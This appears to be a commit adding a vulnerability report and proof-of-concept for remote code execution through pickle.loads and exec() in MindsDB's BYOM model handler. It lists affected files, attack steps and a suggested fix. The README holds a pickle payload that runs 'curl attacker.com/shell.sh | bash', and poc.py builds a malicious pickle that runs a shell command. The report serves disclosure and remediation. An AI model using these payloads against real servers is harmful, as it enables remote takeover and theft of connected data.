PoC: MindsDB BYOM Handler — pickle.loads + exec() RCE
Browse files
README.md
ADDED
|
@@ -0,0 +1,136 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# MindsDB — RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler
|
| 2 |
+
|
| 3 |
+
## Vulnerability Type
|
| 4 |
+
CWE-502: Deserialization of Untrusted Data
|
| 5 |
+
|
| 6 |
+
## Severity
|
| 7 |
+
Critical — Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.
|
| 8 |
+
|
| 9 |
+
## Affected Code
|
| 10 |
+
**File:** `mindsdb/integrations/handlers/byom_handler/byom_handler.py`
|
| 11 |
+
|
| 12 |
+
Three functions deserialize user-controlled model state:
|
| 13 |
+
|
| 14 |
+
```python
|
| 15 |
+
# Line 398 — predict()
|
| 16 |
+
def predict(self, df, model_state, args):
|
| 17 |
+
model_state = pickle.loads(model_state) # ← RCE
|
| 18 |
+
self.model_instance.__dict__ = model_state
|
| 19 |
+
|
| 20 |
+
# Line 407 — finetune()
|
| 21 |
+
def finetune(self, df, model_state, args):
|
| 22 |
+
self.model_instance.__dict__ = pickle.loads(model_state) # ← RCE
|
| 23 |
+
|
| 24 |
+
# Line 419 — describe()
|
| 25 |
+
def describe(self, model_state, attribute=None):
|
| 26 |
+
model_state = pickle.loads(model_state) # ← RCE
|
| 27 |
+
self.model_instance.__dict__ = model_state
|
| 28 |
+
```
|
| 29 |
+
|
| 30 |
+
**Also affected:**
|
| 31 |
+
|
| 32 |
+
`mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55`:
|
| 33 |
+
```python
|
| 34 |
+
model_state = pickle.loads(model_state) # subprocess wrapper
|
| 35 |
+
```
|
| 36 |
+
|
| 37 |
+
`mindsdb/interfaces/query_context/context_controller.py:275`:
|
| 38 |
+
```python
|
| 39 |
+
steps_data = pickle.loads(data) # from cache
|
| 40 |
+
```
|
| 41 |
+
|
| 42 |
+
`mindsdb/integrations/libs/process_cache.py:45`:
|
| 43 |
+
```python
|
| 44 |
+
# IPC via pickle — exception propagation
|
| 45 |
+
```
|
| 46 |
+
|
| 47 |
+
## Attack Chain
|
| 48 |
+
|
| 49 |
+
1. **Attacker creates a BYOM model** via MindsDB SQL:
|
| 50 |
+
```sql
|
| 51 |
+
CREATE MODEL pwned
|
| 52 |
+
PREDICT target
|
| 53 |
+
USING engine='byom',
|
| 54 |
+
code='class Model: pass';
|
| 55 |
+
```
|
| 56 |
+
|
| 57 |
+
2. **The model's `train()` returns `pickle.dumps(self.__dict__)`** — but an attacker who controls the model code can override `__dict__` to contain a malicious pickle payload
|
| 58 |
+
|
| 59 |
+
3. **When `predict()` is called** (e.g., `SELECT * FROM pwned WHERE ...`), the server deserializes the model state with `pickle.loads(model_state)` → arbitrary code execution
|
| 60 |
+
|
| 61 |
+
### Alternative: Direct state injection
|
| 62 |
+
|
| 63 |
+
If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:
|
| 64 |
+
|
| 65 |
+
```python
|
| 66 |
+
import pickle, os
|
| 67 |
+
class Exploit:
|
| 68 |
+
def __reduce__(self):
|
| 69 |
+
return (os.system, ('curl attacker.com/shell.sh | bash',))
|
| 70 |
+
|
| 71 |
+
malicious_state = pickle.dumps(Exploit())
|
| 72 |
+
# Insert into model storage → next predict() = RCE
|
| 73 |
+
```
|
| 74 |
+
|
| 75 |
+
## AI Impact (10x Multiplier)
|
| 76 |
+
|
| 77 |
+
MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:
|
| 78 |
+
|
| 79 |
+
- **Model poisoning** — replace legitimate model with backdoored version
|
| 80 |
+
- **Training data exfiltration** — RCE gives access to all data MindsDB has access to
|
| 81 |
+
- **Database compromise** — MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
|
| 82 |
+
- **Supply chain** — poisoned model persists across restarts and affects all queries
|
| 83 |
+
|
| 84 |
+
## Known CVE Context
|
| 85 |
+
|
| 86 |
+
MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 — eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.
|
| 87 |
+
|
| 88 |
+
## Suggested Fix
|
| 89 |
+
|
| 90 |
+
Replace `pickle.loads` with a safe alternative:
|
| 91 |
+
|
| 92 |
+
```python
|
| 93 |
+
import json
|
| 94 |
+
import jsonpickle
|
| 95 |
+
|
| 96 |
+
def predict(self, df, model_state, args):
|
| 97 |
+
# Use JSON-based deserialization instead of pickle
|
| 98 |
+
model_state = json.loads(model_state)
|
| 99 |
+
# Or use restricted unpickler:
|
| 100 |
+
# model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
|
| 101 |
+
self.model_instance.__dict__ = model_state
|
| 102 |
+
```
|
| 103 |
+
|
| 104 |
+
## Invariant Violated
|
| 105 |
+
S16 (DeserializationGuard): Application MUST NOT use `pickle.loads` on data from user-controlled or shared storage.
|
| 106 |
+
|
| 107 |
+
## Additional Finding: Direct `exec()` on User Model Code
|
| 108 |
+
|
| 109 |
+
**File:** `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80`
|
| 110 |
+
|
| 111 |
+
```python
|
| 112 |
+
def import_string(code, module_name='model'):
|
| 113 |
+
module = types.ModuleType(module_name)
|
| 114 |
+
exec(code, module.__dict__) # ← Direct code execution, NO sandbox
|
| 115 |
+
return module
|
| 116 |
+
```
|
| 117 |
+
|
| 118 |
+
This is the execution path for BYOM models. When a user creates a model with `engine='byom'`, their Python code is passed to `import_string()` which calls `exec()` with no sandboxing, no AST filtering, no import restrictions.
|
| 119 |
+
|
| 120 |
+
The same file also uses `pickle.loads()` for IPC (stdin/stdout between parent and worker):
|
| 121 |
+
|
| 122 |
+
```python
|
| 123 |
+
def decode(encoded):
|
| 124 |
+
return pickle.loads(encoded) # Line 55
|
| 125 |
+
|
| 126 |
+
def get_input():
|
| 127 |
+
with open(0, 'rb') as fd:
|
| 128 |
+
encoded = fd.read()
|
| 129 |
+
obj = decode(encoded) # pickle.loads on stdin
|
| 130 |
+
```
|
| 131 |
+
|
| 132 |
+
### Combined Chain
|
| 133 |
+
1. User creates BYOM model with malicious code → `exec(code)` → RCE
|
| 134 |
+
2. Even if exec were sandboxed, the pickle IPC channel is unprotected → pickle.loads bypass
|
| 135 |
+
|
| 136 |
+
This is a **defense-in-depth failure** — two independent RCE vectors in the same module.
|
poc.py
ADDED
|
@@ -0,0 +1,29 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""MindsDB BYOM Handler — pickle.loads RCE PoC
|
| 2 |
+
|
| 3 |
+
The BYOM (Bring Your Own Model) handler deserializes user-uploaded
|
| 4 |
+
model state via pickle.loads() without any safety checks.
|
| 5 |
+
|
| 6 |
+
Affected: mindsdb/integrations/handlers/byom_handler/byom_handler.py:398
|
| 7 |
+
Also: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80 (exec on user code)
|
| 8 |
+
"""
|
| 9 |
+
import pickle
|
| 10 |
+
import os
|
| 11 |
+
|
| 12 |
+
class MaliciousModel:
|
| 13 |
+
"""When this object is unpickled, it executes arbitrary code."""
|
| 14 |
+
def __reduce__(self):
|
| 15 |
+
return (os.system, ('id > /tmp/pwned',))
|
| 16 |
+
|
| 17 |
+
# This is what happens when a user creates a BYOM model
|
| 18 |
+
# The model state is pickle.dumps'd during train() and pickle.loads'd during predict()
|
| 19 |
+
malicious_state = pickle.dumps(MaliciousModel())
|
| 20 |
+
|
| 21 |
+
print(f"Malicious pickle payload: {len(malicious_state)} bytes")
|
| 22 |
+
print("When MindsDB calls predict() on this model, pickle.loads(model_state) triggers RCE")
|
| 23 |
+
print()
|
| 24 |
+
print("Attack chain:")
|
| 25 |
+
print("1. CREATE MODEL pwned USING engine='byom', code='<malicious model code>'")
|
| 26 |
+
print("2. SELECT * FROM pwned WHERE input='test' -- triggers predict()")
|
| 27 |
+
print("3. predict() calls pickle.loads(model_state) → RCE")
|
| 28 |
+
print()
|
| 29 |
+
print("Additionally, proc_wrapper.py:80 calls exec(code) on the model code directly")
|